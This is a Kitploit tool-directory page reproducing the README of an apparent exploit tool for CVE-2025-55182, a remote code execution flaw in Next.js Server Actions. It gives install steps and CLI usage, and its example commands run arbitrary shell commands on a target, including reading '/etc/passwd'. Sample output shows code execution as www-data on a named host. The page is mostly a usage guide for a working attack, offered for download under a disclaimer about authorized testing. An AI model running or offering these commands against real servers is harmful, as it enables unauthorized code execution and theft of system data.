Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
cve-2025-55182-node — CVE-2025-55182 Next.js RCE Exploit Tool | Kitploit
Tools/GitHubGitHub/racall/cve-2025-55182-node
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubracall/cve-2025-55182-node

cve-2025-55182-node

CVE-2025-55182 Next.js RCE Exploit Tool

View Repository
18 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-55182 Next.js RCE Exploit Tool

中文文档 | 漏洞原理分析


[!CAUTION]

⚠️ DISCLAIMER - READ BEFORE USE

This tool is intended ONLY for:

  • Security researchers conducting vulnerability verification
  • Authorized penetration testing with explicit permission
  • Educational and learning purposes

Unauthorized access to computer systems is ILLEGAL.

By using this tool, you agree that:

  1. You have obtained proper authorization before testing any system
  2. You will not use this tool for malicious purposes
  3. You are solely responsible for your actions and any consequences

The author assumes NO liability for misuse of this tool.


A remote code execution (RCE) exploit tool for Next.js server-side prototype pollution vulnerability.

Vulnerability Overview

CVE-2025-55182 is a critical security vulnerability affecting Next.js that allows attackers to achieve remote code execution through crafted requests exploiting prototype pollution.

📖 For detailed technical analysis, see EXPLOIT.md

Affected Versions

  • Specific versions of Next.js (refer to official security advisory)

How It Works

This vulnerability exploits the Next.js Server Actions request handling mechanism, achieving arbitrary code execution through __proto__ prototype chain pollution combined with the Function constructor.

Installation

root@kitploit:~
# Using yarn
yarn install

# Using npm
npm install

Usage

Direct Execution

root@kitploit:~
# Basic usage
node index.js <target_url> [command]

# Examples
node index.js http://localhost:3000
node index.js http://localhost:3000 "ls -la"
node index.js http://localhost:3000 "cat /etc/passwd"

Using yarn scripts

root@kitploit:~
# Run the tool
yarn start http://localhost:3000 "whoami"

# Or use alias
yarn exploit http://localhost:3000 "ls -la"

# Show help
yarn help

Global CLI Installation

root@kitploit:~
# Link globally
yarn link
# or
npm link

# Then use the command directly
cve-2025-55182 http://localhost:3000
cve-2025-55182 http://localhost:3000 "whoami"

# Unlink
yarn unlink

CLI Options

root@kitploit:~
Usage:
  cve-2025-55182 <url> [command]

Arguments:
  url       Target URL (required)
  command   Command to execute (default: whoami)

Options:
  -h, --help     Show help message
  -v, --version  Show version number

Output Format

The tool outputs results in JSON format:

Successful Execution

root@kitploit:~
{
  "success": true,
  "message": "",
  "data": "command execution result"
}

Failed Execution

root@kitploit:~
{
  "success": false,
  "message": "error message",
  "data": null
}

Example

root@kitploit:~
$ cve-2025-55182 http://vulnerable-site.com "id"
{
  "success": true,
  "message": "",
  "data": "uid=1000(www-data) gid=1000(www-data) groups=1000(www-data)"
}

Dependencies

  • axios - HTTP client
  • form-data - FormData builder

References

  • Refer to Python scripts
Download Tool